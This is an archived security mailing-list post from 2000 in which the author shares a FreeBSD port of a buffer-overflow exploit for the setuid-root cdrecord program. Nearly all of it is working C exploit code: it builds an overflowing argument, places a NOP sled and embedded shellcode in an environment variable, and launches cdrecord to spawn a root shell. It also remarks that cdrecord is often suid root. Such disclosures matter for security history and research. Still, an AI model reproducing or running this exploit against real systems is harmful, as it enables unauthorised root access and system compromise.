OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: Re: Mandrake 7.0: /usr/bin/cdrecord gid=80 (strike #2)
From: sector x (sectorxDIGITALPHOBIA.COM)
Date: Sat Jun 10 2000 - 11:36:13 CDT

Here is a freebsd port of noir's cdrecord buffer overflow.
have you noticed cdrecord is very often suid root on many
systems? :)

--sectorx

-- snip snip --

/* freebsd cdrecord exploit port by sectorx of XOR
(http://xorteam.cjb.net) */

#include <stdio.h>
#include <stdlib.h>

#define LENGTH 76
#define EGGIE 500

long esp() { __asm__("movl %esp, %eax"); }
char devilspawn[];

int main(int argc, char *argv[])
{
   long addr;
   char buf[LENGTH];
   char egg[EGGIE];
   int i,offset;
   
   printf("cdrecord exploit by sectorx (FreeBSD)\n");
   if (argc < 2) {
      printf("error: offset must be supplied as a
parameter\n");
      printf("*note* FreeBSD 3.3-RELEASE\'s offset is
600\n\n");
      return;
   }
   offset = atoi(argv[1]);
   addr = esp()+offset;
   printf("Using offset 0x%x [%d], eip =
0x%x\n",offset,offset,addr);
   /* build the overflow string */
   for (i=0;i<LENGTH;i+=4) *(long*)&buf[i] = addr;
   buf[LENGTH-1] = '\0';
   /* build the egg string */
   memset(&egg,0x90,sizeof(egg));
  
memcpy(egg+(EGGIE-strlen(devilspawn)-1),devilspawn,strlen(devilspawn));
   egg[EGGIE-1] = '\0';
   
   setenv("EGG",egg,1);
  
execl("/usr/local/bin/cdrecord","cdrecord-bin","dev=",buf,"/etc/fstab",0);
}
/* FreeBSD shellcode by mudge of L0pht */
char devilspawn[]=

"\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
  
"\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
  
"\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
   "\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh";